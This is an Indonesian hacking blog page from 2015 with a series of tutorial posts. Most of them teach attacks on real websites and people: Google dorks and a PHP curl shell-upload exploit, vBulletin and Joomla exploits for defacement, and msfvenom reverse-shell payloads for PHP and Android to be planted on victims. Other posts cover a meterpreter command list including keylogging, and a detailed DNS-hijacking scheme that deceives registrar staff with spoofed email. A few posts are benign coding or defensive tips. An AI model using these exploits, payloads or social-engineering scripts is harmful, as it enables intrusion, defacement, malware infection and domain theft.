Open top menu
Showing posts with label Script. Show all posts
Showing posts with label Script. Show all posts
Thursday, December 3, 2015
SQL Injection with Advanced Hackbar


Sebenarnya hackbar yang ini hampir sama dengan hackbar versi original nya, hanya saja lebih powerfull karena ada penambahan tools seperti bypass WAF, Dump in One Shoot ( DIOS ) , dll.  Yang kalian butuhkan hanya mencari jumlah kolom dan angka ajaib nya, dan, hajar dengan DIOS.

Untuk file nya bisa download sisini ;






Tinggal klik kanan > open with firefox > install addons.





Untuk cara menggunakannya bisa lihat video dibawah :










Sekian dan semoga bermanfaat.





Read more
Friday, November 27, 2015
vBulletin Version 5.x.x Remote Code Execution Exploit


vBulletin memang banyak sekali bug meskipun termasuk forum premium karena jika kita ingin memakai harus membeli terlebih dahulu. Baru baru ini ditemukan celah dimana attacker bisa melakukan eksekusi secara remote di cms vb versi 5.x.x.

Exploit Source :






Save dengan ekstensi .pl . contoh vb.pl





lalu masukkan command 


perl vb.pl





Setelah itu masukkan target .


Jika sukses maka kalian bisa memasukkan command seperti dibawah :




Untuk video nya bisa lihat di link dibawah :






Sekian tutor kali ini semoga bermanfaat.

Read more
Wednesday, November 18, 2015
Eksploitasi CMS vBulletin 5.1.2 dengan Metasploit

Kali ini saya akan share tutorial eksploitasi vBulletin 5.1.2 dengan Metasploit. Meskipun saat ini vb sudah melakukan upgrade, namun masih banyak website yang belum mengupdate vb nya ke versi terbaru, jadi masih menyimpan celah.

Pertama, tambahkan module berikut ke metasploit :

https://dl.packetstormsecurity.net/1511-exploits/vbulletin_unserialize.rb.txt

Tutorialnya bisa dilihat disini :

Cara Menambahkan Exploit Baru ke Metasploit



Saat di load via msfconsole, ada beberapa opsi  yang perlu kalian set hanya RHOST dan TARGETURI.

TARGETURI isi dengan path vbulletin diistall, RHOST isi dengan host target / url .





Jika belum jelas, bisa lihat video tutorialnya berikut :

https://www.youtube.com/watch?v=SgTe0d30nqs
Read more
Saturday, November 14, 2015
SMS Spoofing Menggunakan BackBox Linux

SMS Spoofing adalah fitur yang terdapat di tool S.E.T . Sayangnya di update-an SET terbaru, firut tersebut dihilangkan sehingga kita tidak lagi bisa menggunakan SMS Spoofing. Tapi kita tetap bisa menggunakan fitur tersebut jika menggunakan versi SET lama. Cara installnya ? Simak tutor berikut .

Pertama, buka terminal.

lalumasuk ke folder tujuan dimana SET akan ditaruh.



linuxsec@sistem:~% cd tools

linuxsec@sistem:~% mkdir set

linuxsec@system:~% cd set

linuxsec@system:~% wget wget https://github.com/trustedsec/social-engineer-toolkit/archive/5.4.8.zip && unzip 5.4.8.zip

linuxsec@system:~% cd social-engineer-toolkit-5.4.8

linuxsec@system:~% mv * /home/uzumaki/tools/set

linuxsec@system:~% cd ..

linuxsec@system:~% chmod +x setoolkit

linuxsec@system:~% sudo su

root@system:/home/uzumaki/tools/set# ./setoolkit





Lalu..





Fitur SMS Spoofing masih ada.



Sekian tutor kali ini dan semoga bermanfaat.
Read more
Sunday, October 25, 2015
Tutorial Generate Random String menggunakan PHP Script

Kali ini saya akan share cara membuat random string menggunakan bahasa php. Random string biasa digunakan untuk membuat kode kupn, konfirmasi, random password dll. Oke langsung saja ke tutorial.

1. Random String Berisikan Huruf Kecil dan Angka.


<?php

function random_string()

{

    $character_set_array = array();

    $character_set_array[] = array('count' => 7, 'characters' => 'abcdefghijklmnopqrstuvwxyz');

    $character_set_array[] = array('count' => 1, 'characters' => '0123456789');

    $temp_array = array();

    foreach ($character_set_array as $character_set) {

        for ($i = 0; $i < $character_set['count']; $i++) {

            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];

        }

    }

    shuffle($temp_array);

    return implode('', $temp_array);

}

?> 

Simpan file tersebut dengan nama random.php .

Selanjutnya buat file lain dengan nama call.php dan isikan kode berikut :


<?php

include "random.php";

   $random = random_string(0);

 print ("$random");

?>



Cara panggilnya :

via terminal linux bisa ketikkan php call.php

Atau bisa juga di run lewat localhost.

Contoh output : rpca6unz

Terdiri dari 8 karakter dengan 7 huruf kecil dan 1 angka.



2. Random String Berisikan Huruf Kecil, Huruf besar, Simbol, dan Angka.


<?php

function random_string()

{

    $character_set_array = array();

    $character_set_array[] = array('count' => 5, 'characters' => 'abcdefghijklmnopqrstuvwxyz');

    $character_set_array[] = array('count' => 3, 'characters' => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');

    $character_set_array[] = array('count' => 2, 'characters' => '0123456789');

    $character_set_array[] = array('count' => 2, 'characters' => '!@#$+-*&?:');

    $temp_array = array();

    foreach ($character_set_array as $character_set) {

        for ($i = 0; $i < $character_set['count']; $i++) {

            $temp_array[] = $character_set['characters'][rand(0, strlen($character_set['characters']) - 1)];

        }

    }

    shuffle($temp_array);

    return implode('', $temp_array);

}

?>

Simpan dengan mana random.php lalu buat file call.php seperti nomor 1.

Contoh Output : q#Q?w22kaZfC

Terdiri dari 12 karakter dengan 5 huruf kecil, 3 huruf besar, 2 angka, dan 2 simbol.



Mudah bukan ?

Script diatas masih bisa dikembangkan sesuai kebutuhan, misal output hanya berupa simbol dan angka, huruf besar dan angka, dll.



Sekian tutor kali ini dan semoga bermanfaat.
Read more
Thursday, October 22, 2015
Membuka Password File RAR / ZIP dengan Fcrackzip di Linux

Oke kali ini saya akan share tutorial Membuka Password File RAR / ZIP dengan Fcrackzip di Linux. Tools ini sudah tersedia di distro linux pentesting seperti BackBox Linux. Untuk distro lain, silahkan install terlebih dahulu dengan command sudo apt-get install fcrackzip .

Berikut ini adalah tampilan fcrackzip ketika dibuka.



Command yang bisa digunakan :

[-b|--brute-force]            use brute force algorithm

          [-D|--dictionary]             use a dictionary

          [-B|--benchmark]              execute a small benchmark

          [-c|--charset characterset]   use characters from charset

          [-h|--help]                   show this message

          [--version]                   show the version of this program

          [-V|--validate]               sanity-check the algortihm

          [-v|--verbose]                be more verbose

          [-p|--init-password string]   use string as initial password/file

          [-l|--length min-max]         check password with length min to max

          [-u|--use-unzip]              use unzip to weed out wrong passwords

          [-m|--method num]             use method number "num" (see below)

          [-2|--modulo r/m]             only calculcate 1/m of the password

          file...                    the zipfiles to crack





Ada banyak metode yang digunakan. 


Yang pertama adalah menggunakan dictionary.


Untuk lebih mudahnya, file yang akan di crack dengan password jadikan satu.


command yang digunakan :


fcrackzip -D -p password.txt file.zip







Proses akan berhenti jika password ditemukan.


Metode kedua adalah bruteforce tanpa dictionary. Jadi kita yang menentukan sendiri spesifikasi password nya.


contoh command :

fcrackzip -b -l 4 file.zip

Opsi -b artinya menggunakan brute-force algorithm

-l 4 artinya kita menggunakan guessing password dengan panjang 4 karakter .

Untuk command lain bisa di cek di perintah --help .



Sekian tutor kali ini semoga bermanfaat.
Read more
Wednesday, October 21, 2015
Tools Autolike Beranda Facebook versi PHP


Oke kali ini saya share tools autolike beranda facebook versi php script. Tools ini dibuat oleh temen saya bang Eka Syahwan. Fungsi tools ini adalah untuk like semua status di beranda secara otomatis. jadi gak perlu capek nge like satu satu. Yang dibutuhkan hanya akses token.





Untuk tools nya bisa ambil disini : Facebook Auto Like Beranda (CLI Mode)


Save dengan ekstensi php .





Sebeum ke cara pakai, pertama kalian harus menyiapkan akses token fb kalian.


Masukkan di


$token =" akses token "





Untuk cara dapetin akses token bisa pake HTC Sense . Kalau masih bingung googling aja.


cara pakainya ? 


Sama seperti cara menjalankan file php biasa. di Linux tinggal ketik " php namafile.php " atau kalau di Windows harus install XAMPP dulu ya. ;)





Work gak nih ?


Pastinya .




Disitu tertulis " [Success]-> Mereka lupa Isla... - Grey "


Yang artinya sukses like status Grey.







Tools nya aman gak ? 


Aman dong pasti.





Bagaimana ? Tertarik ?


Silahkan mencoba.

Read more
WordPress Security - Mencegah Brute Force pada XMLRPC Wordpress

Baru baru ini telah ditemukan trik bruteforce pada file xmlrpc.php CMS WordPress. Berbeda dengan bruteforce halaman login yang mungkin sudah diantisipasi dengan htaccess ataupun plugins, bruteforce pada file xmlrpc.php ini tidak berbekas.

Jika terdapat banyak log percobaan login saat kita mencoba bruteforce wp-login.php, bruteforce xmlrpc.php hanya meninggalkan satu log percobaan.




194.150.168.95 – – [07/Oct/2015:23:54:12 -0400] “POST /xmlrpc.php HTTP/1.1″ 200 14204 “-” “Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1

WordPress XMLRPC Brute Force Tools Download







Nah , kalau cara bruteforce apsti sudah tau lah ya. Bisa baca baca disini.

Cara Brute Force.



Kali ini saya akan share cara mencegah nya. :




  1. 1. CloudFlare (pelanggan berbayar) sudah menyediakan layanan untuk melindungi XML-RPC dari serangan brute-force. Kalian bisa menggunakannya.

  2. 2. Menggunakan plugins security semacam WordPress Simple Firewall

  3. 3. Disable fungsi system.multicall pada file function.php

  4. 4. Jika kalian tidak menggunakan plugins yang membutuhkan xmlrpc, bisa juga dengan disable / rename saja file ini.






Sekian tutor kali ini semoga bermanfaat.
Read more
Wednesday, October 14, 2015
Decode Obfuscated PHP Script dengan Terminal Linux

Beberapa waktu lalu saya mendownload tema wordpress di google. Lah kok baru dipasang, pas dicek di email terkirim via webmail banyak email keluar yang isinya tentang laporan pemasangan tema yang saya download tadi beserta link backdoor nya. Sial, tema nya dikasih log ternyata !

Beruntung yang digunakan hanya Obfuscator sederhana sehingga cukup mudah untuk di decode.

kali ini saya akan mencoba mendecode script php backdoor yang di Obfuscate.

File yang akan di decode : Link File



Save file nya dengan nama backdoor.php

Kita coba pahami struktur di awal code.

$OOO0O0O00=__FILE__;

$O00O00O00=__LINE__;

$OO00O0000=34764;

eval((base64_decode('base64 encoded script')));return;?>


Nah, ambil bagian base64 nya, lalu simpan dengan nama base64.txt .

Masuk terminal, lalu ketik command

jackwilder@backbox ~/exp/dec % cat base64.txt | base64 -d > decode.txt



maka hasil dari decode nya nanti akan terdapat pada file decode.txt

$O000O0O00=fopen($OOO0O0O00,'rb');

while(--$O00O00O00)fgets($O000O0O00,1024);

fgets($O000O0O00,4096);

$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,372),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
Nah, kita gunakan command berikut untuk mengambil source file yang telah di obfuscate.



jackwilder@backbox ~/exp/dec % tail -1 backdoor.php | tr \

'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=' \

'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' | \

base64 -d > dec.txt



Buka file dec.txt .



Keliatan deh tuyul yang nyelip disitu :D



Sekian tutor kali ini semoga bermanfaat.

Read more
Tuesday, October 6, 2015
Command List Lengkap Meterpreter Session Metasploit

Bagi yang suka mainan Metasploit tentu tidak asing dengan yang nama nya "meterpreter" . Ya, meterpreter ibarat kemenangan karena itu adalah tanda kita sudah mendapatkan kontrol dari Operating System milik korban. Dan kali ini saya akan share command list yang bisa kita gunakan saat sudah masuk ke meterpreter session.







1. Perintah Dasar




  • ? - menu untuk menampilkan command bantuan.

  • background - memindahkan sesi meterpreter ke background

  • bgkill - kill meterpreter yang berjalan di background

  • bglist - menampilkan list proses yang berjalan di background.

  • bgrun - menjalankan script sebagai latarbelakang.

  • channel - menampilkan channel aktif.

  • close - menutup channel.

  • exit / quit - menutup meterpreter session.

  • help - menu bantuan.

  • interact - berinteraksi dengan channel.

  • irb - pindah ke mode script Ruby.

  • migrate - memindahkan proses dengan disertai PID.






2. File System Command.




  • cat - membaca dan membuka file tertentu.

  • cd - change directory

  • del - menghapus file di victim os.

  • download - mendownload file dari victim os ke komputer kita.

  • edit - edit file menggunakan vim.

  • getlwd - melihat direktori lokal.

  • lpwd - print local directory

  • ls - melihat list direktori.

  • mkdir - membuat direktori /folder

  • pwd - print working directorymelihat lokasi dimana kita berada.

  • rm - menghapus file

  • rmdir - menghapus folder

  • upload - mengupload file ke komputer korban.






3. Networking Commands




  • ipconfig - melihat network interfaces korban

  • portfwd - forfarding port dari system ke victim.

  • route - mengubah routing table pada victim os.






4. System Command.




  • clearav - menghapus log di victim os.

  • execute - eksekusi cmmand

  • getpid - meilhat proses ID (PID)

  • getprivs - melihat hak akses

  • getuid - melihat user yang berjalan di server.

  • kill - kill proses berdasarkan PID

  • ps - melihat proses yang berjalan.

  • reboot - me reboot os korban

  • reg - berinteraksi dengan registry sistem di os korban.

  • shell - membuka command shell di os korban.

  • shutdown - mematikan os korban.

  • sysinfo - melihat system info.






5. User Interface Command




  • enumdesktops - melihat dekstop yang aksesible

  • getdesktop - masuk ke desktop meterpreter saat ini

  • idletime - melihat waktu diam dari meterpreter session

  • keyscan_dump - dump dari isi keylogger

  • keyscan_start - menjalankan keylogger

  • keyscan_stop - menghentikan keylogger

  • screenshot - screenshoot desktop






6. Privilege Escalation Commands




  • getsystem - metode untuk mendapatkan hak akses system administrator.


Read more
Tuesday, September 29, 2015
Hack All Operating System with PHP Payloads Metasploit Framework

Oke kali ini saya akan share cara mendapatkan meterpreter session pada metasploit menggunakan backdoor PHP. Yang akan saya terangan hanya pokok pokok nya saja. Jadi bagi yang belum paham samasekali bisa baca di " Hack Windows 7 with S.E.T + Metasploit on BackBox Linux ".

Oke, kali ini kita akn buat backdoor nya.

root@backbox:/home/jackwilder# msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=666 -e php/base64 --platform php > payload.php





Oke saya jelaskan keterangannya :


-e : encode menggunakan php base64.


--platform : platform yang akan digunakan.





Nanti output nya adalah file bernama payload.php .


File tadi masih bentuk mentah tanpa awalan <?php .


Kalian bisa menyisipkan payload tadi di file lain.


Lalu buka metasploit.






root@backbox:/home/jackwilder# msfconsole




msf > use exploit/multi/handler


msf exploit(handler) > set payload php/meterpreter/reverse_tcp


payload => php/meterpreter/reverse_tcp


msf exploit(handler) > set LHOST 127.0.0.1


LHOST => 127.0.0.1


msf exploit(handler) > set LPORT 666


LPORT => 666


msf exploit(handler) > exploit





[*] Started reverse handler on 127.0.0.1:666 


[*] Starting the payload handler...






Tunggu sampai target mengeksekusi payloads.




Welcome meterpreter session.





bagi yang kurang jelas bisa lihat video nya disini :

Hack Kali Linux OS with PHP Payloads BackBox Linux



Sekian tutor kali ini semoga bermanfaat,
Read more
Friday, September 18, 2015
Exploit ZeusCart CMS dan Upload Shell

Kali ini mau share sedikit tutorial Exploit ZeusCart CMS dan Upload Shell. Exploit ini vuln untuk versi ZeusCart 4.0 . Oke langsung saja ke tutorial. Cukup mudah kok.

Dork : use your brain.

Exploiter : download



Oke , setelah menemukan target anggap kalian sudah login ke web korban dengan user dan password baru kalian.

Lalu pergi ke tempat tambah iklan .

http://localhost/zeuscart/admin/?do=homepageads

Gunakan firefox untuk melakukan tamper data.

Upload shell yang sudah diubah ekstensi nya ke bentuk jpg.





Jika sudah, shell kalian akan terletak di

http://localhost/zeuscart/images/homepageads/randomnameshell.php





Jika kurang paham bisa dilihat di video berikut :





Sekian tutor kali ini semoga bermanfaat.
Read more
Wednesday, September 16, 2015
Exploit Ninja Application Remote Code Vulnerability

Kali ini saya akan share exploit yang lumayan poluler yaitu Exploit Ninja Application Remote Code Vulnerability. Oke langsung saja ke tutorial.

Google dorks : use your brain !

Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}

Victim : /ninja-applications/fufu/controllers/uploader/upload.php



Exploit Code :


<?php

$url = "http://localhost/ninja-applications/fufu/controllers/uploader/upload.php"; 

$post = array

(

"file" => "@shell.jpg",

"name" => "shell.php"

);

$ch = curl_init ("$url");

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

?>





Shell access : localhost/uploads/temp/fufu(random code)shell.php . ex: fufu55f9730a4ea30sh.php





Pertama, dorking dulu di google.


Lalu cek urlnya : http://localhost/ninja-applications/fufu/controllers/uploader/upload.php







Jika ada vuln code seperti di ss, berarti situs tersebut bisa dieksekusi.


Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux.







Tinggal diakses shell nya sesuai nama yang tertera di terminal.




Mudah bukan ? Sekian tutor kali ini semoga bermanfaat. :)

Read more
Thursday, September 10, 2015
Deface dengan Joomla com_myblog Exploit

Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.

Langsung saja

Google dork : inurl:/components/com_myblog/

Exploiter : download

Exploit : /index.php?option=com_myblog&task=ajaxupload



Jika kalian mendapat error


{error: 'No file has been uploaded.', msg: '' }



Tanda nya situsnya vuln.

Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.

Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg

Jika sukses maka akan ada notice seperti di screenshoot :



Shell akses :

localhost/images/shell.php.xxxjpg





Untuk yang kurang jelas bia lihat videonya disini :







Sekian tutor kali ini semoga bermanfaat.
Read more
Sunday, September 6, 2015
no image

Assalamualaikum..

Kali ini saya akan share tutorial hack android dengan Metasploit di Backbox Linux. Tapi tentu saja kita membutuhkan payloads yang akan dijadikan umpan .

Pertama, buka terminal dan jalankan perintah ifconfig

Ini untuk mengetahui ip kita yang akan digunakan sebagai lhost nya.

Lalu masukkan perintah berikut :

root@sistem:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=1337 R > payload.apk

payload.apk ini yang akan digunakan sebagai payloads. Terserah dinamai apa.



Lalu buka msfconsole.

root@sistem:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST [ip kita]

LHOST => 192.168.1.67

msf exploit(handler) > set LPORT 1337

LPORT => 1337



msf exploit(handler) > exploit



Setelah itu, kita share payload.apk tadi ke Android korban. Dan korban harus menginstall nya. Terserah pakai cara apa. Gunakan social engineering mu.

Dan tunggu di terminal mu sampai masuk ke meterpreter session.



[*] Started reverse handler on 10.11.12.29:1337

[*] Starting the payload handler...

[*] Sending stage (769536 bytes) to 10.11.12.179

[*] Meterpreter session 1 opened (10.11.12.29:1337 -> 10.11.12.179:49164) at 2015-9-03 02:07:42 +0700



Sekian tutor kali ini semoga bermanfaat.
Read more
Tuesday, August 25, 2015
Deface Dengan Pligg CMS CSRF Add Admin Exploit

Oke lama tidak share tutor tentang exploit, kali ini saya mau share tutor deface dengan judul Pligg CMS CSRF Add Admin Exploit. Exploitnya cukup mudah. Langsung saja bahan bahannya :



Exploiter nya :

Download disini.

Dork :

intext:"Made wtih Pligg CMS"



Langkah langkah :

Save exploiternya dalam bentuk PHP.

Pada bagian

<form action="http://localhost/jmbut/admin/admin_users.php"method="post" id="createUserForm" name="exploit" onsubmit="returncheckValidation()">
    Sesuaikan dengan url target.

    Begitu juga dengan username , email dan password nya.

    Lalu jalankan exploiternya di Localhost atau hostingan kalian.

    Maka akan di redirrect ke halaman login web korban.



    Jika step step nya benar maka kalian langsung masuk ke halaman admin :





    Mudah bukan ?

    Selamat mencoba.



    Exploit Author: Arash Khazaei ( Exploit-DB )
    Read more
    Monday, August 17, 2015
    no image

    Tutorial DNS Hijacking via Social Engineering Exposed



    Author : Nabilaholic404

    Team : Indonesian Cyber Army, HN-Community, IndoXploit Coders

    Tested on : IDWebh*st, R*mahweb, Niagah*ster, R*seller.co.id, Resellerc*mp, dll .





    Berawal dari domain saya www.madura-cyber.org yang tiba tiba di deface padahal menggunakan blogspot , saya sempat panik karena saya pikir akun blogger saya yang di hack, lalu saya coba login ke akun blog dan cek template, ternyata tidak ada perubahan . Saya login ke akun domain saya di IDW*bhost, sukses, dalam artian akun saya juga tidak di hack, tapi saya kaget karena nameserver domain saya tiba tiba berubah. :| . Saya sempat berpikir apa mungkin akun gmail saya yang di hack, tapi itu juga tidak masuk akal karena akun saya menggunakan verifikasi login dengan nomor hape. Oke fix, ini DNS Hijacking dengan membodohi CS registrar tempat saya membeli domain tersebut, yupp, CS IDW*bhost ! .



    Setelah kejadian tersebut, saya tidak pernah komplain ke pihak IDW*bhost, karena saya juga agak "tertarik" untuk mencoba trik dns hijacking tersebut.

    Pertama tama, yang perlu disiapkan adalah mengetahui pemilik dari domain tersebut.

    Bisa di cek di whois.domaintools.com / who.is/whois .

    Kalau privacy protected gimana ?

     Gampang ? itu bisa diakali . :D . Ketik saja di google dengan keyword "www.domain.com email" . Biasanya bakal nyangkut di akun twitter si pemilik domain, atau setidaknya kita dapat info tambahan. Explore terus.



    Berawal dari eksperimen saya waktu itu dengan teman saya "Cyberfvcker" , saya mulai mencoba melakukan social engineering terhadap cs IDW*bhost saat itu kalau tidak salah nama nya Ari Muh*ram atau siapalah . Agak pinter cs yang satu ini sungkem pak Ari (-/\-) :v

    saat itu saya diminta menyebutkan empat digit terakhir password akun IDW*bhost saya, saya cuma bilang "sebentar" lalu saya close tab yang berisi chat saya dengan cs idweb via live chat waktu itu.

    But, its not over, beby.. :)

    Saat itu target saya domain my.id . Dan saya tau kalau reseller.co.id adalah mitra IDW*bhost untuk domain .id :D .

    Lalu saya ketik r*seller.co.id di addres bar, buka live chat .

    Masukkan nama dan email sesuai dengan pemilik domain yang didapat di whois.



    CS : Selamat sore, ada yang bisa dibantu ?

    Saya : Hmm, ini mau nanya mas, apa untuk domain .id sedang ada gangguan ya kok saya ingin mengubah dns domain saya mengalami kegagalan.

    CS : gagalnya seperti apa pak ?

    Saya : seperti dns tidak dikenali begitu. 

    CS : Nama domain nya apa pak ?

    Saya : cyber-f***e.my.id .

    CS : Baik saya bantu. Mau diarahkan kemana ns nya pak ? ( BINGOOOOOO !! )

    Saya : ke ini pak, ns1.yuyudhn1337.org , ns2.yuyudhn1337.org .

    CS : Baik sudah kami ubahkan. Butuh waktu maksimal 1x24jam agar ns nya resolved ke ns baru ya pak.

    Saya : Iya pak. 

    CS : ada yang perlu ditanyakan lagi ?

    Saya : tidak, terimakasih.



    Itu adalah trik social engineering paling mudah. Yupp, tingkat kecerobohan CS beda beda. Dan mungkin di kasus diatas, cs nya ceroboh level 99 :D

    Tanpa verifikasi.

    Tapi yang perlu diingat, JANGAN PERNAH MENYURUH CS UNTUK MENGGANTI DNS . Ingat, jangan menyuruh, karena itu akan membuat dia curiga. Fungsi live chat itu hanya untuk menaggapi keluhan, bukan untuk membantu mengubahkan dns.

    Jadi logikan nya, di live chat itu kalian hanya "mengeluh" , dan jika cs nya "peka" , maka dia yang akan menawarkan diri untuk mengganti dns domain target kalian.



    Intinya, jika gagal di IDW*bhost. langsung lari ke r*seller.co.id . Itu untuk domain id, untuk domain tld ( com, net, org ), lari ke r*sellercamp.com .

    Dengan trik chat yang sama, karena IDW*bhost, r*seller.co.id, r*sellercamp.com itu kerjasama. :D

    Selalu cek whois.



    Kali ini kita coba yang lebih expert. Ciyeee bahasanya :v

    Jadi bakal ada sedikit gangguan .



    Tapi harus modal dikit, yaitu domain lain yang dibeli di registrar yang sama dengan domain korban.

    Jadi jika misal target kalian di IDW*bhost, maka kalian juga butuh akun domain di IDW*bhost.



    Go !!



    CS : selamat malam, ada yang bisa dibantu ?

    Saya : iya malam. saya mau nanya apa saat ini idweb sedang ada gangguan ya kok saya mau ganti dns gagal.

    CS : bisa disebutkan domainnya ?

    Saya : jkt48f**s.com .

    CS : saat ini di member area tidak ada masalah pak. anda bisa mengganti dns melalui tab nameserver di member area.

    Saya : tapi saya kesulitan saat mengbah dns.

    CS : maaf pak, tapi perubahan dns harus dilakukan sesuai prosedur, dan tidak lewat live chat. bapak tidak ingin kan ada orang yang tiba tiba mengaku sebagai pemilik domain bapak ? ( jegerrr... gawat nih :D )

    Saya : tapi memang daritadi error pak. ini bukti nya. ( sambil ngasih screenshoot panel domain yang ada tulisannya jkt48f**s.com . Dan itu darimana, ? yupp, fungsi dari panel domain diawal tadi untuk diinspect element, kita ganti nama domain disana dengan nama domain korban. :D )

    cS : Tapi tetap saja tidak bisa pak.

    Saya : hmm.. terus apa gunanya live chat jika tidak bisa membantu samasekali. makin kesini kok IDW*bhost makin parah pelayanan nya. :)

    CS : .... ( mau ngetik .. tapi gak selesai selesai :v )

    CS : mau diarahkan kemana pak dns nya ? ( GOTCHAAAA ! )

    Saya : ke ns1.yuyudhn1337.org , ns2.yuyudhn1337.org .

    CS : sudah saya rubahkan , silahkan di cek kembali.

    Saya : oh baik pak. iya sudah. (padahal gak ngecek ) . Kira2 kok saya tadi error kenapa ya ? (alibi, biar cs nya gak curiga)

    CS : mungkin bapak tadi salah memasukkan ns seperti spasi di ns. itu menyebabkan error.

    Saya : oohh.. maaf kalau begitu saya yang ceroboh. terimakasih penjelasannya.

    CS : iya sama sama pak.



    Thats simple man :D

    Kecenderungan manusia adalah menghindari konflik :D . Dan itulah "bug" yang kita manfaatkan dalam social engineering . Saat saya bilang "makin kesini kok IDW*bhost makin parah pelayanannya " . Itu hanya bertujuan agar cs tadi merasa bersalah , dan terbukti, its work , man !! :D



    Mari ke trik selanjutnya. Ini lebih expert .

    Target nya inc*f.or.id .

    Saat cek whois, hzzzzzz Digital R*gistra .

    Dan digital r*gistra ini banyak banget afiliasi nya, yang pertama r*mahweb, niagah*ster, masterw*b, dan masih banyak lagi.

    Kita tidak tau domain ini dibeli dimana, jadi kita harus chat satu satu. :'(



    Oke, pertama, kita cari tahu dulu domain tersebut di dibeli dimana :D

    Saat itu pertama saya chat di niagahoster.



    CS : selamat siang, ada yang bisa dibantu ?

    Saya : selamat siang pak, saya mau nanya apa benar kalau niagahoster sama digital registra itu kerja sama ya ?

    CS : iya betul pak, kami berafiliasi dengan digital r*gistra.

    Saya : saya ingin menanyakan apa domain inc*f.or.id dibeli disini pak ? soalnya saya beli domainnya ke teman via ym. dan tidak diberi akses ke panel domainnya :D .

    CS : sebentar pak saya cek. ..

    CS : domain tersebut berada di rumahweb pak, silahkan contact rumahweb untuk info lebih lanjut .



    Bingo !! :D

    Lanjut ke r*mahweb .

    Kali ini chat dengan nama berbeda dari nama yang tertera di whois pemilik domain :D . Lets see !



    CS : selamat siang ada yang bisa dibantu ?

    Saya : begini pak, tim kami kan beberapa bulan yang lalu membeli domain di r*mahweb , tapi hanya satu orang yang memiliki akses ke panel domain. masalahnya saat ini server kamis edang di ddos oleh tim lain pak, dan kami ingin segera melakukan maintenance dan mengganti server nya. 

    CS : nama domainnya pak ?

    Saya : inc*f.or.id 

    CS : betul pak domain tersebut dibeli di r*mahweb . apa kendala nya ?

    Saya : masalahnya admin yang memiliki akses ke member area tersebut offline sudah sekitar seminggu pak. dan tidak bisa saat saya coba bbm.

    CS : bapak ingin mengganti ns nya 

    Saya : iya pak. urgent.

    CS : bapak bisa melakukan request pergantian dns via email ke support@r*mahweb.co.id melalui email d******@gmail.com . itu email yang terdaftar untuk domain tersebut pak .



    ( Sebenarnya disini kalian bisa langsung mengirim email seperti permintaan si cs, namun untuk me "real" kan situasi , mari kita mengeluh terlebih dahulu :v )

    Saya : masalahnya itu email teman saya yang offline tadi pak.

    CS : perubahan dns harus dilakukan sesuai prosedur pak, dan salahsatunya jika tidak bisa via member area harus melalui email.

    Saya : tapi ini penting pak masalahnya , server yang sekarang akan segera down jika tdk segera di maintenance.

    CS : bapak bisa menghubungi temannya untuk mengganti dns nya.

    Saya : baik pak.saya coba telfon teman saya dulu.



    lalu saya gunakan mailer untuk mengirim email request.

    Gak perlu meiler khusus, saya cuma pake mailer yang sudah ada di shell b374k :p



    to : support@r*mahweb.co.id

    from : Den*y M****fat <de******@gmail.com>

    Subject : Pergantian DNS

    isi :

    Halo rumahweb . saya tadi ditelfon teman saya untuk mengubah dns domain saya inc*f.or.id ke nameserver berikut :

    ns1.yuyudhn1337.org

    ns2.yuyudhn1337.org



    bisa tolong settingkan  soalnya cuma saya yang punya akses ke domain tersebut, dan saat ini saya tidak online pc. lagi ada perlu diluar soalnya.

    tolong fast respon ya soalnya saya tidak mau diganggu teman saya terus.

    saya mau ofline lagi.



    lalu send !



    "tolong fast respon ya soalnya saya tidak mau diganggu teman saya terus.

    saya mau ofline lagi."

    kenapa ? soalnya saya tau kalau sistem perubahan dns via email itu sebenarnya kalau cs nya pinter, sistemnya sudah bagus :D . yaitu kita request, cs ngirim balesan dan kode tiket nya, kita disuruh reply kode tiket tersebut untuk konfirmasi . berhubung via mailer, jadi kita tidak pernah tau kode tiket nya karena bakal dikirim ke email yang asli :D

    maka nya saya beri imbuhan saya mau offline lagi seakan akan si pengirim tidak akan membuka email nya lagi :D



    jeda 5 menit, kembali chat rumahweb nya :D



    Saya : saya sya**** yang tadi mas .

    CS : iya pak .

    Saya : saya tadi sudah telfon teman saya, terus barusan di sms kata nya dia gak bisa soalnya lagi di jalan gitu. tapi dia sudah kirim email ke support@r*mahweb.co.id .

    CS : baik saya cek .

    Saya : iya pak saya tunggu .

    CS : ns nya sudah saya ubah ke ns yang baru pak . ada lagi yag bisa dibantu ?

    Saya : tidak ada pak. terimakasih. sukses terus buat rumahweb .

    CS : iya pak. sama sama .



